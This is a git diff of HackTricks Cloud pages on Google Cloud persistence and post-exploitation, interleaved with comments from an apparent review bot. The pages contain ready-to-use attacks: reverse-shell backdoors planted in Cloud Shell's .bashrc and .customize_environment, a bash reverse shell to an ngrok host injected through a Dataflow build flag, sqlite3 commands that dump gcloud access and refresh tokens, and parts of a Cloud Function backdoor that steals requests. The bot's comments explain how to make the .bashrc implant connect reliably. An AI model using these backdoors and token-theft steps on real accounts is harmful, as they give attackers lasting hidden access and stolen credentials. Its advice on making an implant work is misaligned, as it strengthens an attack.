+Create a new backdoored revision of a Run Service and split some traffic to it.
+
+### Publicly Accessible Service
+
+Make a Service publicly accessible
+
+### Backdoored Service or Job
+
+Create a backdoored Service or Job
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
new file mode 100644
index 000000000..c38442234
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
@@ -0,0 +1,69 @@
+# GCP - Cloud Shell Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Shell
+
+For more information check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-shell-enum.md
+{{#endref}}
+
+### Persistent Backdoor
+
+[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
+
+You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
+
+This console has some interesting capabilities for attackers:
+
+1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
+2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
+3. There is **no capabilities for an organisation to monitor** the activity of that instance.
+
+This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
+
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
+```
+
+There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
+
+```bash
+#!/bin/sh
+apt-get install netcat -y
+nc 443 -e /bin/bash
+```
+
+> [!WARNING]
+> It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
+
+This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
+
+
+
+However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
+
+```bash
+gcloud auth print-access-token
+gcloud auth application-default print-access-token
+```
+
+#### How the SSH connection is stablished
+
+Basically, these 3 API calls are used:
+
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
+- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
+
+But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+
+## References
+
+- [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
+- [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+- [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
new file mode 100644
index 000000000..795314341
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
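Review bot: In the `.bashrc` backdoor line, `'$CCSERVER'` sits outside the single quotes, so it is expanded by the attacker's own shell when the `echo` runs, not when the victim's `.bashrc` is later sourced; if `CCSERVER` is unset at that moment an empty host is baked into the file and the implant silently never connects. Either export it first or hardcode the listener, e.g. `>& /dev/tcp/LISTENER_IP/443`, and say so next to the snippet. Point 3 ("no capabilities for an organisation to monitor") is also stronger than the page supports: as far as I recall Google Workspace admins can disable Cloud Shell for their users from the Admin console, which is the defensive counterpart worth a sentence here.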
@@ -0,0 +1,37 @@
+# GCP - Cloud SQL Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud SQL
+
+For more information about Cloud SQL check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-sql-enum.md
+{{#endref}}
+
+### Expose the database and whitelist your IP address
+
+A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\
+For more information check the technique in:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+{{#endref}}
+
+### Create a new user / Update users password / Get password of a user
+
+To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\
+Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\
+Remember that **it's possible to list the users of a database** using GCP API.
+
+> [!NOTE]
+> You can create/update users using GCP API or from inside the databae if you have enough permissions.
+
+For more information check the technique in:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
new file mode 100644
index 000000000..aebbe350c
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
@@ -0,0 +1,19 @@
+# GCP - Compute Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Compute
+
+For more informatoin about Compute and VPC (Networking) check:
+
+{{#ref}}
+../gcp-services/gcp-compute-instances-enum/
+{{#endref}}
+
+### Persistence abusing Instances & backups
+
+- Backdoor existing VMs
+- Backdoor disk images and snapshots creating new versions
+- Create new accessible instance with a privileged SA
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
new file mode 100644
index 000000000..9eb6791c1
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
@@ -0,0 +1,53 @@
+# GCP - Dataflow Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+### Invisible persistence in built container
+
+Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
+
+```bash
+git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
+cd python-docs-samples/dataflow/flex-templates/getting_started
+
+# Create repository where dockerfiles and code is going to be stored
+export REPOSITORY=flex-example-python
+gcloud storage buckets create gs://$REPOSITORY
+
+# Create artifact storage
+export NAME_ARTIFACT=flex-example-python
+gcloud artifacts repositories create $NAME_ARTIFACT \
+ --repository-format=docker \
+ --location=us-central1
+gcloud auth configure-docker us-central1-docker.pkg.dev
+
+# Create template
+export NAME_TEMPLATE=flex-template
+gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
+ --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
+ --sdk-language "PYTHON" \
+ --flex-template-base-image "PYTHON3" \
+ --metadata-file "metadata.json" \
+ --py-path "." \
+ --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
+ --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
+ --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
+ --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
+ --region=us-central1
+```
+
+**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
+
+Then, next time the job is executed, the compromised container built will be run:
+
+```bash
+# Run template
+gcloud dataflow $NAME_TEMPLATE run testing \
+ --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
+ --parameters=output="gs://$REPOSITORY/out" \
+ --region=us-central1
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
new file mode 100644
index 000000000..2777d5391
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
@@ -0,0 +1,21 @@
+# GCP - Filestore Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Filestore
+
+For more information about Filestore check:
+
+{{#ref}}
+../gcp-services/gcp-filestore-enum.md
+{{#endref}}
+
+### Give broader access and privileges over a mount
+
+An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page:
+
+{{#ref}}
+gcp-filestore-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
new file mode 100644
index 000000000..86265608f
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
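Review bot: The `gcloud dataflow $NAME_TEMPLATE run` command at the end of the Dataflow hunk reads the template spec from `gs://$NAME_ARTIFACT/getting_started-py.json`, but the build step above wrote it to `gs://$REPOSITORY/getting_started-py.json`; it only works because both variables happen to hold `flex-example-python`, so it should be `--template-file-gcs-location="gs://$REPOSITORY/getting_started-py.json"`. The `--image-gcr-path` also hardcodes the project `gcp-labs-35jfenjy` and the reverse shell targets a fixed ngrok host, so a reader copying the block must replace both; a `# replace with your project id / your listener` comment on those two lines would make that explicit.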
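Review bot: The `{{#ref}}` under "Give broader access and privileges over a mount" in the Filestore hunk points at `gcp-filestore-persistence.md`, i.e. this very page, so "find how to perform this actions in this page" leads nowhere. It presumably should follow the `../gcp-post-exploitation/...` or `../gcp-privilege-escalation/...` pattern the sibling pages in this commit use; confirm which Filestore page actually holds the share-permission steps before fixing the link.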
@@ -0,0 +1,21 @@
+# GCP - Logging Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Logging
+
+Find more information about Logging in:
+
+{{#ref}}
+../gcp-services/gcp-logging-enum.md
+{{#endref}}
+
+### `logging.sinks.create`
+
+Create a sink to exfiltrate the logs to an attackers accessible destination:
+
+```bash
+gcloud logging sinks create --log-filter="FILTER_CONDITION"
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
similarity index 63%
rename from pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
rename to src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
index 848dcdb7a..8c553e503 100644
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
+++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
@@ -1,55 +1,38 @@
 # GCP - Token Persistance
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ### Authenticated User Tokens To get the **current token** of a user you can run: -{% code overflow="wrap" %} ```bash sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='';" ``` -{% endcode %} Check in this page how to **directly use this token using gcloud**: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1 +{{#endref}} To get the details to **generate a new access token** run: -{% code overflow="wrap" %} ```bash sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='';" ``` -{% endcode %} It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**. To get a new refreshed access token with the **refresh token**, client ID, and client secret run: -{% code overflow="wrap" %} ```bash curl -s --data client_id= --data client_secret= --data grant_type=refresh_token --data refresh_token= --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token ``` -{% endcode %} The refresh tokens validity can be managed in **Admin** > **Security** > **Google Cloud session control**, and by default it's set to 16h although it can be set to never expire: -
+
### Auth flow 
@@ -61,24 +44,21 @@ The authentication flow when using something like `gcloud auth login` will open Then, gcloud will use the state and code with a some hardcoded `client_id` (`32555940559.apps.googleusercontent.com`) and **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) to get the **final refresh token data**. -{% hint style="danger" %} -Note that the communication with localhost is in HTTP, so it it's possible to intercept the data to get a refresh token, however this data is valid just 1 time, so this would be useless, it's easier to just read the refresh token from the file. -{% endhint %} +> [!CAUTION] +> Note that the communication with localhost is in HTTP, so it it's possible to intercept the data to get a refresh token, however this data is valid just 1 time, so this would be useless, it's easier to just read the refresh token from the file. ### OAuth Scopes You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing: -{% code overflow="wrap" %} ```bash curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u ``` -{% endcode %} It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script: ```bash -curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do +curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do echo -ne "Testing $scope \r" if ! 
curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then echo "" @@ -118,20 +98,7 @@ Some remediations for these techniques are explained in [https://www.netskope.co ### References -* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1) -* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2) +- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1) +- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md new file mode 100644 index 000000000..16b9ea247 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md @@ -0,0 +1,22 @@ +# GCP - Secret Manager Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Secret Manager + +Find more information about Secret Manager in: + +{{#ref}} +../gcp-services/gcp-secrets-manager-enum.md +{{#endref}} + +### Rotation misuse + +An attacker could update the secret to: + +- **Stop rotations** so the secret won't be modified +- **Make rotations much less often** so the secret won't be modified +- **Publish the rotation message to a different pub/sub** +- **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md new file mode 100644 index 000000000..ad54454ba --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md 
@@ -0,0 +1,38 @@
+# GCP - Storage Persistence
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Storage
+
+For more information about Cloud Storage check:
+
+{{#ref}}
+../gcp-services/gcp-storage-enum.md
+{{#endref}}
+
+### `storage.hmacKeys.create`
+
+You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
+
+```bash
+# Create key
+gsutil hmac create
+
+# Configure gsutil to use it
+gsutil config -a
+
+# Use it
+gsutil ls gs://[BUCKET_NAME]
+```
+
+Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
+
+### Give Public Access
+
+**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-storage-post-exploitation.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
similarity index 100%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
new file mode 100644
index 000000000..4a92c4c1b
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
@@ -0,0 +1,43 @@
+# GCP - App Engine Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## `App Engine`
+
+For information about App Engine check:
+
+{{#ref}}
+../gcp-services/gcp-app-engine-enum.md
+{{#endref}}
+
+### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush`
+
+With these permissions it's possible to:
+
+- Add a key
+- List keys
+- Get a key
+- Delete
+
+> [!CAUTION]
+> However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**.
+>
+> If you know easier ways to use these permissions send a Pull Request!
+
+### `logging.views.access`
+
+With this permission it's possible to **see the logs of the App**:
+
+```bash
+gcloud app logs tail -s
+```
+
+### Read Source Code
+
+The source code of all the versions and services are **stored in the bucket** with the name **`staging..appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.
+
+### Modify Source Code
+
+Modify source code to steal credentials if they are being sent or perform a defacement web attack.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
new file mode 100644
index 000000000..08e30528d
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
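Review bot: Under "Read Source Code" in the App Engine hunk, reading the staging bucket only needs read access, yet the sentence says "If you have write access over it you can read the source code"; write access is what the following "Modify Source Code" section needs. Suggested wording: `If you have read access over it you can read the source code and search for vulnerabilities and sensitive information; with write access you can also alter it (see below).`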
@@ -0,0 +1,21 @@
+# GCP - Artifact Registry Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{{#ref}}
+../gcp-services/gcp-artifact-registry-enum.md
+{{#endref}}
+
+### Privesc
+
+The Post Exploitation and Privesc techniques of Artifact Registry were mixed in:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-artifact-registry-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
new file mode 100644
index 000000000..115fa6ee9
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
@@ -0,0 +1,29 @@
+# GCP - Cloud Build Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Build
+
+For more information about Cloud Build check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-build-enum.md
+{{#endref}}
+
+### `cloudbuild.builds.approve`
+
+With this permission you can approve the execution of a **codebuild that require approvals**.
+
+```bash
+# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve
+curl -X POST \
+ -H "Authorization: Bearer $(gcloud auth print-access-token)" \
+ -H "Content-Type: application/json" \
+ -d '{{
+ "approvalResult": {
+ object (ApprovalResult)
+ }}' \
+ "https://cloudbuild.googleapis.com/v1/projects//locations//builds/:approve"
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
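Review bot: The request body in the Cloud Build `:approve` curl example is the REST reference's type placeholder (`object (ApprovalResult)`) rather than JSON, so the call as written is rejected by the API. A working body is `-d '{"approvalResult": {"decision": "APPROVED"}}'`, `decision` being the field the approve endpoint reads (`comment` is optional). The doubled braces `'{{` / `}}'` look like escaping for the mdbook preprocessor; if so, confirm they render as single braces, otherwise they are a second reason the snippet fails when pasted.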
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md similarity index 76% rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md index 24c013b55..8057b3b10 100644 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md @@ -1,40 +1,25 @@ # GCP - Cloud Functions Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Cloud Functions Find some information about Cloud Functions in: -{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} -[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md) -{% endcontent-ref %} +{{#ref}} +../gcp-services/gcp-cloud-functions-enum.md +{{#endref}} ### `cloudfunctions.functions.sourceCodeGet` With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function: -{% code overflow="wrap" %} ```bash curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \ -H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \ -H "Content-Type: application/json" \ -d '{}' ``` -{% endcode %} ### Steal Cloud Function Requests @@ -83,7 +68,7 @@ def exfiltrate(request): except Exception as e: if not "read operation timed out" in str(e): return str(e) - + return "" def new_http_view_func_wrapper(function, request): @@ -93,7 +78,7 @@ def new_http_view_func_wrapper(function, request): return function(request._get_current_object(), last=True, error=error) except Exception as e: return str(e) - + return view_func """ @@ -104,14 +89,14 @@ def injection(): import flask import os import importlib - import sys + import sys if os.access('/tmp', os.W_OK): new_function_path = "/tmp/function.py" with open(new_function_path, "w") as f: f.write(new_function) os.chmod(new_function_path, 0o777) - + if not os.path.exists('/tmp/function.py'): return "/tmp/function.py doesn't exists" 
@@ -132,12 +117,12 @@ def injection(): spec_handler.loader.exec_module(module_handler) spec_backdoor.loader.exec_module(module_backdoor) - # make the cloud funtion use as handler the new function + # make the cloud funtion use as handler the new function prev_handler = getattr(module_handler, handler_fname) new_func_wrap = getattr(module_backdoor, 'new_http_view_func_wrapper') app.view_functions["run"] = new_func_wrap(prev_handler, flask.request) return "Injection completed!" - + except Exception as e: return str(e) ``` diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md new file mode 100644 index 000000000..101518536 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md @@ -0,0 +1,23 @@ +# GCP - Cloud Run Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Run + +For more information about Cloud Run check: + +{{#ref}} +../gcp-services/gcp-cloud-run-enum.md +{{#endref}} + +### Access the images + +If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables. + +If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service. + +### Modify & redeploy the image + +Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending. + +{{#include ../../../banners/hacktricks-training.md}} 
